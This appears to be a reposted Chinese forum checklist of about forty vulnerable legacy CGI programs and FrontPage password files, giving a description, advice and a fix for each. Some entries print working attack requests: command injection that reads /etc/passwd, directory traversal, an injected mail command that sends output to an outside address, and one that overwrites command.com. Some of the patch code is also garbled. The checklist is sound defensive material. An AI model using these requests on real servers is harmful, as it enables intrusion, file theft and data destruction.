描述: 如果您使用NT做為您的WebServer的操作系統,而且"wguest.exe"存在於您的Web可執行目錄中的話,入侵者將能利用它閱讀到您的硬盤上所有USR_用戶能閱讀的文件。
建議: 將wguset.exe從你的Web目錄移走或刪除。
解決方法: 將wguset.exe從你的Web目錄移走或刪除。
2.rguset.exe
描述: 如果您使用NT做為您的WebServer的操作系統,而且rguest.exe存在於您的Web可執行目錄中的話,入侵者將能利用它閱讀到您的硬盤上所有USR_用戶能閱讀的文件。
建議: 將rguset.exe從你的Web目錄移走或刪除。
解決方法: 將rguset.exe從你的Web目錄移走或刪除。
3. perl.exe
描述: 在cgi-bin執行目錄下存在perl.exe,這屬於嚴重的配置錯誤。黑客可以在perl.exe後面加一串指令,利用瀏覽器在server上執行任何腳本程序。
建議: perl.exe是放在任何帶執行權限的web目錄下都是不安全的。
解決方法: 在web目錄下移除perl.exe這個程序。
4.shtml.exe
描述: 如果您使用Front Page作為您的WebServer,那麼入侵者能夠利用IUSR_用戶和shtml.exe入侵您的機器,做您不希望的事。
建議: 將shtml.exe從你的Web目錄移走或刪除。
解決方法: 將shtml.exe從你的Web目錄移走或刪除。
5. wwwboard.pl
描述: wwwboard.pl程序容易引起攻擊者對服務器進行D.O.S攻擊。
建議: 如無必要可以刪除該文件。
解決方法: 對get_variables的子程序中的下面這段:
if ($FORM{'followup'}) { $followup = "1";
@followup_num = split(/,/,$FORM{'followup'});
$num_followups = @followups = @followup_num;
$last_message = pop(@followups);
$origdate = "$FORM{'origdate'}";
$origname = "$FORM{'origname'}";
$origsubject = "$FORM{'origsubject'}"; }
替換為:
if ($FORM{'followup'}) {
$followup = "1";
@followup_num = split(/,/,$FORM{'followup'});
$num_followups = @followups = @followup_num;
$last_message = pop(@followups);
$origdate = "$FORM{'origdate'}";
$origname = "$FORM{'origname'}";
$origsubject = "$FORM{'origsubject'}";
# WWWBoard Bomb Patch
# Written By: Samuel Sparling sparling@slip.net)
$fn=0;
while($fn < $num_followups)
{
$cur_fup = @followups $fn];
$dfn=0;
foreach $fm(@followups)
{
if(@followups[$dfn] == @followups[$fn] && $dfn != $fn)
{
&error(board_bomb);
}
$dfn++;
}
$fn++;
}
# End WWWBoard Bomb Patch
}
6. uploader.exe
描述: 如果您使用NT作為您的WebServer的操作系統,入侵者能夠利用uploader.exe上傳任何文件
建議: 將uploader.exe從你的Web目錄移走或刪除。
解決方法: 將uploader.exe從你的Web目錄移走或刪除。
7. bdir.htr
描述: 如果您使用NT做為您的WebServer的操作系統,而且bdir.htr 存在於您的Web可執行目錄中的話,入侵者將能利用它在您的服務器上無止境的創建ODBC數據庫,並生成一些可執行的文件。
建議: 將bdir.htr從你的Web目錄移走或刪除。
解決方法: 將bdir.htr從你的Web目錄移走或刪除。
8. Count.cgi
類型: 攻擊型
描述: 在/cgi-bin目錄下的Count.cgi程序(wwwcount2.3版本)有一個溢出錯誤,允許入侵者無須登錄而遠程執行任何指令。
建議: 如無必要可以刪除該文件。
解決方法: 將wwwcount升級到2.4或者以上。
9. test-cgi
描述: test-cgi這個文件可以被入侵者用來瀏覽服務器上的重要信息。
建議: 建議審核cgi-bin目錄下的執行程序,嚴格控制訪問權限。
解決方法: 刪除test-cgi文件。
10.nph-test-cgi
描述: nph-test-cgi這個文件可以被入侵者用來瀏覽服務器上的重要信息。
建議: 建議審核cgi-bin目錄下的執行程序,嚴格控制訪問權限。
解決方法: 刪除nph-test-cgi文件。
11. php.cgi
描述: php.cgi程序有較多的漏洞,包括緩存溢出漏洞,還有導致任何系統文件可以被入侵者讀取的漏洞
建議: 建議審核cgi-bin目錄,避免有不必要的程序存在。
解決方法: 刪除php.cgi程序是最好的辦法。
12.handler
描述: IRIX 5.3, 6.2, 6.3, 6.4的/cgi-bin/handler程序存在緩存溢出錯誤,允許入侵者在server上遠程執行一段程序:
telnet target.machine.com 80
GET /cgi-bin/handler/whatever;cat /etc/passwd| ?
data=Download
HTTP/1.0
建議: 建議審核cgi-bin目錄,避免有不必要的程序存在。
解決方法: 刪除handler文件。
13. webgais
描述: /cgi-bin,目錄下的webgais是GAIS搜索工具的一個接口,它
有一個毛病使入侵者可以繞過程序的安全機制,執行系統命令:
POST /cgi-bin/webgais HTTP/1.0
Content-length: 85 (replace this with the actual length of
the "exploit" line)
telnet target.machine.com 80
query=';mail+you\@your.host&domain=paragraph
建議: 建議審核cgi-bin目錄,避免有不必要的程序存在。
解決方法: 刪除webgais文件。
14.websendmail
描述: /cgin-bin目錄下的websendmail程序允許入侵者執行一個系統指令:
telnet target.machine.com 80
POST /cgi-bin/websendmail HTTP/1.0
Content-length: xxx (should be replaced with the actual
length of the string passed to the server, in this case
xxx=90)
receiver=;mail+your_address\@somewhere.orger=a&rtnaddr=a&subject=a
&content=a
建議: 建議審核cgi-bin目錄,避免有不必要的程序存在。
解決方法: 高級用戶:編輯websendmail腳本,過濾特殊字符。
一般用戶:刪除websendmail文件。
15.webdist.cgi
描述: 對於Irix6.2和6.3平台,/cgi-bin目錄下的webdist.cgi有一個弱點允許入侵者無須登錄而在系統上執行任何指令:
_blank>http://host/cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd
建議: 建議審核cgi-bin目錄,避免有不必要的程序存在。
解決方法: 刪除/var/www/cgi-bin/webdist.cgi目錄下的webdist.cgi。
16. faxsurvey
描述: 在Linux S.u.S.E上/cgi-bin目錄下的faxsurvey程序允許入侵者無須登錄就能在服務器執行指令:
linux.elsewhere.org/cgi-bin/faxsurvey?/bin/cat% " target=_blank>http://joepc.linux.elsewhere.org/cgi-bin/faxsurvey?/bin/cat%
20/etc/passwd
建議: 建議審核cgi-bin目錄,避免有不必要的程序存在。
解決方法: 刪除/cgi-bin/faxsurvey文件。
17. htmlscript
描述: 安裝了htmlscript2.99x或者更早版本的服務器,存在一個毛病使入侵者可以查看服務器上的任何文件:
_blank>http://www.vulnerable.server.com/cgi-
bin/htmlscript?../../../../etc/passwd
建議: 建議審核cgi-bin目錄,避免有不必要的程序存在。
解決方法: 刪除/cgi-bin/htmlscript腳本文件,或者將htmlscript升級到3。0以上。
18. www-sql
描述: www-sql存在於/cgi-bin/目錄下,這將導致入侵可以越權訪問被保護的文件。
建議: 最好刪除www-sql文件。
解決方法: #if PHPFASTCGI
while(FCGI_Accept() >= 0)
{
#endif
s = getenv("REDIRECT_STATUS");
if(!s) {
puts("Content-type: text/plain\r\n\r\nPHP/FI detected an
internal error. Please inform sa@hogia.net of what you just
did.\n");
exit(1);
}
s = getenv("PATH_TRANSLATED");
19.名字: view-source
描述: 在cgi-bin目錄下的view-source程序沒有對輸入進行安全檢查,使入侵者可以查看服務器上的任何文件
建議: 建議審核cgi-bin目錄,避免有不必要的程序存在。
解決方法: 刪除/cgi-bin目錄下的viewsource程序。
20. campas
描述: 在cgi-bin目錄下的campas程序有一個毛病可以使入侵者隨意查看server上的重要文件:
telnet www.xxxx.net 80
Trying 200.xx.xx.xx...
Connected to venus.xxxx.net
Escape character is '^]'.
GET /cgi-bin/campas?%0acat%0a/etc/passwd%0a
建議: 建議審核cgi-bin目錄,避免有不必要的程序存在。
解決方法: 刪除/cgi-bin目錄下的campas程序。
21.aglimpse
描述: 在cgi-bin目錄下的aglimpse程序有一個毛病可以使入侵者無須登錄而隨意執行任何指令
建議: 建議審核cgi-bin目錄,避免有不必要的程序存在。
解決方法: 刪除/cgi-bin目錄下的aglimpse程序。
22.AT-admin.cgi
描述: 在Excite for Web Servers 1.1上的/cgi-bin/AT-admin.cgi
程序,允許普通用戶完全控制整個系統
建議: 建議審核cgi-bin目錄,避免有不必要的程序存在。
解決方法: 刪除/cgi-bin目錄下的AT-admin.cgi程序。
23. finger
描述: 這個位於/cgi-bin下的finger程序,可以查看其它服務器的信息,但是如果將參數改成本機,本機上的帳號信息將暴露無遺:
/cgi-bin/finger?@localhost
建議: 建議審核cgi-bin目錄,避免有不必要的程序存在。
解決方法: 刪除/cgi-bin目錄下的finger程序。
24. webwho.pl
描述: 如果在您的Web可執行目錄中有webwho.pl這個CGI腳本,那麼入侵者將能利用他閱讀啟動Web的用戶能讀寫執行的任何文件。
建議: 將webwho.pl從您的Web目錄中刪除或移走。
解決方法: 將webwho.pl從您的Web目錄中刪除或移走。
25. w3-msql
描述: MiniSQL軟件包發行版本附帶的一個CGI(w3-msql)可被用於以httpd的uid權限執行任意代碼。這個安全漏洞是由程序中的scanf()函數引起的。
建議: 如果您安裝了MiniSQL軟件包,請您將/cgi-bin/目錄下的w3-msql文件刪除或移走
解決方法: 如果您安裝了MiniSQL軟件包,請您將/cgi-bin/目錄下的w3-msql文件刪除或移走.
26. Netscape FastTrack server 2.0.1a
描 述: UnixWare 7.1附帶的Netscape FastTrack server 2.0.1a存在一個遠程緩衝區溢出漏洞。缺省地,監聽457端口的httpd通過http協議提供UnixWare文檔。如果向該服務器傳送一個長度超 過367字符的GET請求,會使緩衝區溢出,EIP值被覆蓋將可能導致任意代碼以httpd權限執行。
建議: 臨時解決方法是關閉Netscape FastTrack服務器。
解決方法: 臨時解決方法是關閉Netscape FastTrack服務器。
27. AnyForm.cgi
描述: 位於cgi-bin目錄下的AnyForm.cgi程序,是用於簡單表單通過郵件傳遞響應的,但該程序對用戶輸入檢查不徹底,可被入侵者利用,在server上執行任何指令。
建議: 建議審核cgi-bin目錄,避免有不必要的程序存在。
解決方法:建議升級該cgi程序,或者刪除該文件。
28. whois.cgi
描述:在多個WebServer中帶有的Whois.cgi存在溢出漏洞。它們包括:
Whois Internic Lookup - version: 1.02
CC Whois - Version: 1.0
Matt's Whois - Version: 1
他們將使入侵者能夠在您的系統上使用啟動httpd用戶的權限執行任意的代碼
建議: 將在您Web目錄中問whois.cgi刪除或移走。
解決方法: 將在您Web目錄中問whois.cgi刪除或移走。
29. environ.cgi
描述: 在Apache web server或者IIS等其它web server的/cgi-bin/environ.cgi 程序,有一個毛病允許入侵者繞過安全機制,瀏覽服務器上的一些文件。
建議: 建議審核cgi-bin目錄,避免有不必要的程序存在。
解決方法: 建議升級該cgi程序,或者刪除該文件。
30. wrap
描述: /cgi-bin/wrap程序有兩個漏洞,均允許入侵者獲取服務器上文件的非法訪問,如:
_blank>http://host/cgi-bin/wrap?/../../../../../etc
建議: 建議審核cgi-bin目錄,避免有不必要的程序存在。
解決方法: 刪除/cgi-bin/wrap文件。
31. edit.pl
描述: /cgi-bin/edit.pl有一個安全弱點,用下面這條命令就可以訪問用戶的配置情況:
_blank>http://www.sitetracker.com/cgi-bin/edit.pl?
account=&password=
建議: 建議審核cgi-bin目錄,避免有不必要的程序存在。
解決方法: 刪除/cgi-bin/edit.pl文件。
32.service.pwd
描述: UNix系統的_vti_pvt/service.pwd" target=_blank>http://www.hostname.com/_vti_pvt/service.pwd可讀,將暴露用戶密碼信息。
建議: 建議刪除
解決方法:chown root service.pwd
chmod 700 service.pwd
33.administrators.pwd
描述: UNix系統的_vti_pvt/administrators.pwd" target=_blank>http://www.hostname.com/_vti_pvt/administrators.pwd可讀,將暴露用戶密碼信息
建議: 建議刪除
解決方法:chown root administrators.pwd
chmod 700 administrators.pwd
34.users.pwd
描述: UNix系統_vti_pvt/users.pwd " target=_blank>http://www.hostname.com/_vti_pvt/users.pwd可讀,將暴露用戶密碼信息
建議: 建議刪除
解決方法: chown root users.pwd
chmod 700 users.pwd
35. authors.pwd
描述: UNix系統的_vti_pvt/authors.pwd" target=_blank>http://www.hostname.com/_vti_pvt/authors.pwd可讀,將暴露用戶密碼信息
建議: 建議刪除
解決方法: chown root authors.pwd
chmod 700 authors.pwd
36. visadmin.exe
描述: 在OmniHTTPd Web Server的cgi-bin目錄下存在這個文件visadmin.exe,那麼攻擊者只要輸入下面的命令:
_blank>http://omni.server/cgi-bin/visadmin.exe?user=guest
數分鐘之後服務器的硬盤將會被撐滿。
建議: 建議刪除。
解決方法: 把visadmin.exe從cgi-bin目錄中刪除
37. get32.exe
描述: Alibaba的web server,其cgi-bin目錄存在get32.exe這個程序,允許入侵者任意執行一條指令:
_blank>http://www.victim.com/cgi-bin/get32.exe|echo%
20>c:\command.com
建議: 建議刪除。
解決方法: 把GET32.exe從cgi-bin目錄中刪除。
38. alibaba.pl
描述: Alibaba的web server,其cgi-bin目錄存在alibaba.pl這個程序,允許入侵者任意執行一條指令:
_blank>http://www.victim.com/cgi-bin/alibaba.pl|dir
建議: 建議刪除。
解決方法: 把alibaba.pl從cgi-bin目錄中刪除。
39. tst.bat
描述: Alibaba的web server,其cgi-bin目錄存在tst.bat這個程序,允許入侵者任意執行一條指令:
_blank>http://www.victim.com/cgi-bin/tst.bat|type%
20c:\windows\win.ini
建議: 建議刪除。
解決方法: 把tst.bat從cgi-bin目錄中刪除。
40.fpcount.exe
描述: 如果您使用NT作為您的WebServer的操作平台,並只安裝了SP3補丁,那麼入侵者能利用這個CGI程序進行DoS攻擊,使您的IIS服務拒絕訪問。
建議: 將在您Web目錄中的fpcount.exe刪除或移走。
解決方法: 將在您Web目錄中的fpcount.exe刪除或移走
http://bbs.tech.ccidnet.com/read.php?tid=518981 原文出處
全站熱搜
留言列表